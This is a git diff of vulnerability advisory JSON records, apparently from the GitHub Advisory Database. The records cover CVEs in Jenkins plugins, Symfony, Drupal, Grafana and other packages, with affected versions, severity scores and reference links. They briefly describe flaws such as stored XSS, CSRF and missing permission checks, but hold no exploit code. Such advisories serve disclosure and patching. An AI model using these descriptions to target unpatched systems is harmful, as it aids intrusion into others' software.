Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", "severity": [ { @@ -14,7 +15,15 @@ } ], "affected": [ - + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:kmap-jenkins" + }, + "versions": [ + "1.6" + ] + } ], "references": [ { @@ -39,8 +48,8 @@ "CWE-522" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:51:21Z", "nvd_published_at": "2019-04-04T16:29:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-74c2-965q-mqjw/GHSA-74c2-965q-mqjw.json b/advisories/github-reviewed/2022/05/GHSA-74c2-965q-mqjw/GHSA-74c2-965q-mqjw.json new file mode 100644 index 0000000000000..6d969f23692d6 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-74c2-965q-mqjw/GHSA-74c2-965q-mqjw.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-74c2-965q-mqjw", + "modified": "2024-01-30T21:15:46Z", + "published": "2022-05-24T16:58:50Z", + "aliases": [ + "CVE-2019-10457" + ], + "summary": "Missing permission check in Jenkins Oracle Cloud Infrastructure Compute Classic Plugin ", + "details": "A missing permission check in Jenkins Oracle Cloud Infrastructure Compute Classic Plugin allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:oracle-cloud-infrastructure-compute-classic" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.0.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10457" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-10-16/#SECURITY-1462" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/10/16/6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:15:46Z", + "nvd_published_at": "2019-10-16T14:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-7577-f8fp-5977/GHSA-7577-f8fp-5977.json b/advisories/github-reviewed/2022/05/GHSA-7577-f8fp-5977/GHSA-7577-f8fp-5977.json new file mode 100644 index 0000000000000..1611cfcd24685 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-7577-f8fp-5977/GHSA-7577-f8fp-5977.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7577-f8fp-5977", + "modified": "2024-01-30T22:12:23Z", + "published": "2022-05-14T02:57:57Z", + "aliases": [ + "CVE-2018-1999029" + ], + "summary": "Stored Cross-Site Scripting Vulnerability in Jenkins Shelve Project Plugin", + "details": "A cross-site scripting vulnerability exists in Jenkins Shelve Project Plugin 1.5 and earlier in ShelveProjectAction/index.jelly, ShelvedProjectsAction/index.jelly that allows attackers with Job/Configure permission to define JavaScript that would be executed in another user's browser when that other user performs some UI actions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:shelve-project-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.5" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999029" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-07-30/#SECURITY-1001" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:12:23Z", + "nvd_published_at": "2018-08-01T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-774g-r3fm-4v85/GHSA-774g-r3fm-4v85.json b/advisories/github-reviewed/2022/05/GHSA-774g-r3fm-4v85/GHSA-774g-r3fm-4v85.json new file mode 100644 index 0000000000000..351c1baf858f3 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-774g-r3fm-4v85/GHSA-774g-r3fm-4v85.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-774g-r3fm-4v85", + "modified": "2024-01-30T22:39:23Z", + "published": "2022-05-17T00:29:02Z", + "aliases": [ + "CVE-2017-1000090" + ], + "summary": "CSRF vulnerability in Jenkins Role-based Authorization Strategy Plugin configuration", + "details": "Role-based Authorization Strategy Plugin was not requiring requests to its API be sent via POST, thereby opening itself to Cross-Site Request Forgery attacks. This allowed attackers to add administrator role to any user, or to remove the authorization configuration, preventing legitimate access to Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:role-strategy" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.5.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000090" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-07-10/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:39:23Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-7f6w-fhmr-j8hq/GHSA-7f6w-fhmr-j8hq.json b/advisories/github-reviewed/2022/05/GHSA-7f6w-fhmr-j8hq/GHSA-7f6w-fhmr-j8hq.json new file mode 100644 index 0000000000000..0d6360e12d43c --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-7f6w-fhmr-j8hq/GHSA-7f6w-fhmr-j8hq.json @@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7f6w-fhmr-j8hq", + "modified": "2024-01-30T23:16:51Z", + "published": "2022-05-17T00:50:19Z", + "aliases": [ + "CVE-2014-9635" + ], + "summary": "Jenkins HttpOnly flag not Set for session cookies", + "details": "Jenkins before 1.586 does not set the HttpOnly flag in a Set-Cookie header for session cookies when run on Tomcat 7.0.41 or later, which makes it easier for remote attackers to obtain potentially sensitive information via script access to cookies.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.586" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9635" + }, + { + "type": "WEB", + "url": "https://github.com/jenkinsci/jenkins/commit/582128b9ac179a788d43c1478be8a5224dc19710" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=769682" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1185151" + }, + { + "type": "WEB", + "url": "https://issues.jenkins-ci.org/browse/JENKINS-25019" + }, + { + "type": "WEB", + "url": "https://jenkins.io/changelog-old/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2015/01/22/3" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/72054" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:16:51Z", + "nvd_published_at": "2017-09-12T14:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-7gfc-2v6g-6w9f/GHSA-7gfc-2v6g-6w9f.json b/advisories/github-reviewed/2022/05/GHSA-7gfc-2v6g-6w9f/GHSA-7gfc-2v6g-6w9f.json new file mode 100644 index 0000000000000..11d41ea52c856 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-7gfc-2v6g-6w9f/GHSA-7gfc-2v6g-6w9f.json @@ -0,0 +1,94 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7gfc-2v6g-6w9f", + "modified": "2024-02-08T15:52:06Z", + "published": "2022-05-17T05:45:29Z", + "aliases": [ + "CVE-2010-2477" + ], + "summary": "Paste is vulnerable to Cross-site Scripting via vectors involving a 404 status code", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in the paste.httpexceptions implementation in Paste before 1.7.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving a 404 status code, related to (1) paste.urlparser.StaticURLParser, (2) paste.urlparser.PkgResourcesParser, (3) paste.urlmap.URLMap, and (4) HTTPNotFound.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "paste" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.7.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2477" + }, + { + "type": "WEB", + "url": "https://github.com/cdent/paste/commit/4910493c62f369a3222357af09450930e4c93f5e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/cdent/paste" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20111227133546/http://secunia.com/advisories/42500" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20120527154041/http://www.securityfocus.com/bid/41160" + }, + { + "type": "WEB", + "url": "http://bitbucket.org/ianb/paste/changeset/fcae59df8b56" + }, + { + "type": "WEB", + "url": "http://groups.google.com/group/paste-users/browse_thread/thread/3b3fff3dadd0b1e5?pli=1" + }, + { + "type": "WEB", + "url": "http://groups.google.com/group/pylons-discuss/msg/8c256dc076a408d8?dmode=source&output=gplain" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=127785414818815&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=127792576822169&w=2" + }, + { + "type": "WEB", + "url": "http://pylonshq.com/articles/archives/2010/6/paste_174_released_addresses_xss_security_hole" + }, + { + "type": "WEB", + "url": "http://www.ubuntu.com/usn/USN-1026-1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:52:05Z", + "nvd_published_at": "2010-11-06T00:00:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-7gfx-wxfh-7rvm/GHSA-7gfx-wxfh-7rvm.json b/advisories/github-reviewed/2022/05/GHSA-7gfx-wxfh-7rvm/GHSA-7gfx-wxfh-7rvm.json index 940ff938abc97..5edfb70b9a230 100644 --- a/advisories/github-reviewed/2022/05/GHSA-7gfx-wxfh-7rvm/GHSA-7gfx-wxfh-7rvm.json +++ b/advisories/github-reviewed/2022/05/GHSA-7gfx-wxfh-7rvm/GHSA-7gfx-wxfh-7rvm.json @@ -60,6 +60,10 @@ "type": "WEB", "url": "https://github.com/smarty-php/smarty/commit/f9ca3c63d1250bb56b2bda609dcc9dd81f0065f8" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/smarty/smarty/CVE-2018-13982.yaml" + }, { "type": "WEB", "url": "https://github.com/sbaresearch/advisories/tree/public/2018/SBA-ADV-20180420-01_Smarty_Path_Traversal" diff --git a/advisories/github-reviewed/2022/05/GHSA-7hwc-2cq4-6x2w/GHSA-7hwc-2cq4-6x2w.json b/advisories/github-reviewed/2022/05/GHSA-7hwc-2cq4-6x2w/GHSA-7hwc-2cq4-6x2w.json index da43ec9d32101..c8602e8615da6 100644 --- a/advisories/github-reviewed/2022/05/GHSA-7hwc-2cq4-6x2w/GHSA-7hwc-2cq4-6x2w.json +++ b/advisories/github-reviewed/2022/05/GHSA-7hwc-2cq4-6x2w/GHSA-7hwc-2cq4-6x2w.json @@ -109,6 +109,101 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.48" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.41" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.0" + }, + { + "fixed": "3.3.17" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0" + }, + { + "fixed": "3.4.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.11" + } + ] + } + ] } ], "references": [ @@ -120,6 +215,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/b20e83562e32c56f8d9b8296ab07b0e4c0a54db8" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-bundle/CVE-2018-11408.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2018-11408.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -143,6 +246,10 @@ { "type": "WEB", "url": "https://symfony.com/blog/cve-2018-11408-open-redirect-vulnerability-on-security-handlers" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2018-11408" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-7m2x-qhrq-rp8h/GHSA-7m2x-qhrq-rp8h.json b/advisories/github-reviewed/2022/05/GHSA-7m2x-qhrq-rp8h/GHSA-7m2x-qhrq-rp8h.json new file mode 100644 index 0000000000000..c06c71778bd24 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-7m2x-qhrq-rp8h/GHSA-7m2x-qhrq-rp8h.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7m2x-qhrq-rp8h", + "modified": "2024-02-01T21:46:57Z", + "published": "2022-05-24T17:18:38Z", + "aliases": [ + "CVE-2020-13430" + ], + "summary": "Grafana XSS via the OpenTSDB datasource", + "details": "Grafana before 7.0.0 allows tag value XSS via the OpenTSDB datasource.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.0.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13430" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/24539" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/releases/tag/v7.0.0" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200528-0003/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:46:57Z", + "nvd_published_at": "2020-05-24T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-7mvg-cx9c-r6jm/GHSA-7mvg-cx9c-r6jm.json b/advisories/github-reviewed/2022/05/GHSA-7mvg-cx9c-r6jm/GHSA-7mvg-cx9c-r6jm.json new file mode 100644 index 0000000000000..ea11741150684 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-7mvg-cx9c-r6jm/GHSA-7mvg-cx9c-r6jm.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7mvg-cx9c-r6jm", + "modified": "2024-01-30T21:21:32Z", + "published": "2022-05-24T16:44:55Z", + "aliases": [ + "CVE-2019-10312" + ], + "summary": "Missing permission check in Jenkins Ansible Tower Plugin", + "details": "A missing permission check in Jenkins Ansible Tower Plugin 0.9.1 and earlier in the TowerInstallation.TowerInstallationDescriptor#doFillTowerCredentialsIdItems method allowed attackers with Overall/Read permission to enumerate credentials ID of credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:ansible-tower" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.9.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.9.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10312" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-30/#SECURITY-1355" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/30/5" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/108159" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:21:32Z", + "nvd_published_at": "2019-04-30T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-7p4p-v6hr-gp3m/GHSA-7p4p-v6hr-gp3m.json b/advisories/github-reviewed/2022/05/GHSA-7p4p-v6hr-gp3m/GHSA-7p4p-v6hr-gp3m.json new file mode 100644 index 0000000000000..b48a90b9ff426 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-7p4p-v6hr-gp3m/GHSA-7p4p-v6hr-gp3m.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7p4p-v6hr-gp3m", + "modified": "2024-01-30T23:19:23Z", + "published": "2022-05-14T03:13:12Z", + "aliases": [ + "CVE-2018-1000196" + ], + "summary": "Jenkins Gitlab Hook Plugin stores and displays GitLab API token in plain text", + "details": "A exposure of sensitive information vulnerability exists in Jenkins Gitlab Hook Plugin 1.4.2 and older in gitlab_notifier.rb, views/gitlab_notifier/global.erb that allows attackers with local Jenkins master file system access or control of a Jenkins administrator's web browser (e.g. malicious extension) to retrieve the configured Gitlab token.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.ruby-plugins:gitlab-hook" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.4.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000196" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-05-09/#SECURITY-263" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:19:23Z", + "nvd_published_at": "2018-06-05T21:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-7pr3-34rg-g53m/GHSA-7pr3-34rg-g53m.json b/advisories/github-reviewed/2022/05/GHSA-7pr3-34rg-g53m/GHSA-7pr3-34rg-g53m.json index 7baf1ecd890d2..74d7051d1c7c4 100644 --- a/advisories/github-reviewed/2022/05/GHSA-7pr3-34rg-g53m/GHSA-7pr3-34rg-g53m.json +++ b/advisories/github-reviewed/2022/05/GHSA-7pr3-34rg-g53m/GHSA-7pr3-34rg-g53m.json @@ -59,6 +59,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8140" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8140.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" diff --git a/advisories/github-reviewed/2022/05/GHSA-7w53-hfpw-rg3g/GHSA-7w53-hfpw-rg3g.json b/advisories/github-reviewed/2022/05/GHSA-7w53-hfpw-rg3g/GHSA-7w53-hfpw-rg3g.json index d5728103cd4c1..3143655cfea2e 100644 --- a/advisories/github-reviewed/2022/05/GHSA-7w53-hfpw-rg3g/GHSA-7w53-hfpw-rg3g.json +++ b/advisories/github-reviewed/2022/05/GHSA-7w53-hfpw-rg3g/GHSA-7w53-hfpw-rg3g.json @@ -22,7 +22,26 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.0" + "introduced": "2.2.0-BETA1" + }, + { + "fixed": "2.2.0-BETA2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" }, { "fixed": "2.0.22" @@ -41,7 +60,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.1" + "introduced": "2.1.0" }, { "fixed": "2.1.7" @@ -53,17 +72,55 @@ { "package": { "ecosystem": "Packagist", - "name": "symfony/symfony" + "name": "symfony/yaml" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.0.22" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/yaml" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.1.0" + }, + { + "fixed": "2.1.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/yaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "2.2" + "introduced": "2.2.0-BETA1" }, { - "fixed": "2.2.12" + "fixed": "2.2.0-BETA2" } ] } @@ -75,14 +132,30 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1397" }, + { + "type": "WEB", + "url": "https://github.com/symfony/symfony/commit/ba6e3159c0eeb3b6e21db32fce8fa2535cb3aa77" + }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81551" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2013-1397.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/yaml/CVE-2013-1397.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" }, + { + "type": "WEB", + "url": "https://symfony.com/blog/security-release-symfony-2-0-22-and-2-1-7-released" + }, { "type": "WEB", "url": "http://secunia.com/advisories/51980" diff --git a/advisories/github-reviewed/2022/05/GHSA-7w6p-rwhg-7h3g/GHSA-7w6p-rwhg-7h3g.json b/advisories/github-reviewed/2022/05/GHSA-7w6p-rwhg-7h3g/GHSA-7w6p-rwhg-7h3g.json new file mode 100644 index 0000000000000..3781e781703fc --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-7w6p-rwhg-7h3g/GHSA-7w6p-rwhg-7h3g.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7w6p-rwhg-7h3g", + "modified": "2024-02-01T21:24:14Z", + "published": "2022-05-24T17:07:02Z", + "aliases": [ + "CVE-2020-6638" + ], + "summary": "Grin Insufficient Validation", + "details": "Grin through 2.1.1 has Insufficient Validation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "grin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-6638" + }, + { + "type": "WEB", + "url": "https://github.com/mimblewimble/grin-security/blob/master/CVEs/CVE-2020-6638.md" + }, + { + "type": "WEB", + "url": "https://github.com/mimblewimble/grin/compare/v2.1.1...v3.0.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:24:14Z", + "nvd_published_at": "2020-01-21T20:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-836p-6p4j-35cg/GHSA-836p-6p4j-35cg.json b/advisories/github-reviewed/2022/05/GHSA-836p-6p4j-35cg/GHSA-836p-6p4j-35cg.json index 301105646a209..6024413c746ba 100644 --- a/advisories/github-reviewed/2022/05/GHSA-836p-6p4j-35cg/GHSA-836p-6p4j-35cg.json +++ b/advisories/github-reviewed/2022/05/GHSA-836p-6p4j-35cg/GHSA-836p-6p4j-35cg.json @@ -71,6 +71,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0" + }, + { + "fixed": "8.0.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0" + }, + { + "fixed": "7.43" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0" + }, + { + "fixed": "6.38" + } + ] + } + ] } ], "references": [ @@ -78,6 +135,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-3164" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2016-3164.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2016-3164.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/drupal/drupal" diff --git a/advisories/github-reviewed/2022/05/GHSA-83c3-qx27-2rwr/GHSA-83c3-qx27-2rwr.json b/advisories/github-reviewed/2022/05/GHSA-83c3-qx27-2rwr/GHSA-83c3-qx27-2rwr.json index 77cbd988c9cbe..b210b0e613935 100644 --- a/advisories/github-reviewed/2022/05/GHSA-83c3-qx27-2rwr/GHSA-83c3-qx27-2rwr.json +++ b/advisories/github-reviewed/2022/05/GHSA-83c3-qx27-2rwr/GHSA-83c3-qx27-2rwr.json @@ -12,6 +12,63 @@ ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-foundation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.0.19" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/routing" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.0.19" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.0.19" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -22,10 +79,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.0" + "introduced": "2.0.0" }, { - "fixed": "2.0.20" + "fixed": "2.0.19" } ] } @@ -45,6 +102,26 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/8b2c17f80377582287a78e0b521497e039dd6b0d" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-foundation/CVE-2012-6431.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/routing/CVE-2012-6431.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2012-6431.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2012-6431.yaml" + }, + { + "type": "WEB", + "url": "https://symfony.com/blog/security-release-symfony-2-0-20-and-2-1-5-released" + }, { "type": "WEB", "url": "http://symfony.com/blog/security-release-symfony-2-0-20-and-2-1-5-released" diff --git a/advisories/github-reviewed/2022/05/GHSA-85xw-3hp5-6fmc/GHSA-85xw-3hp5-6fmc.json 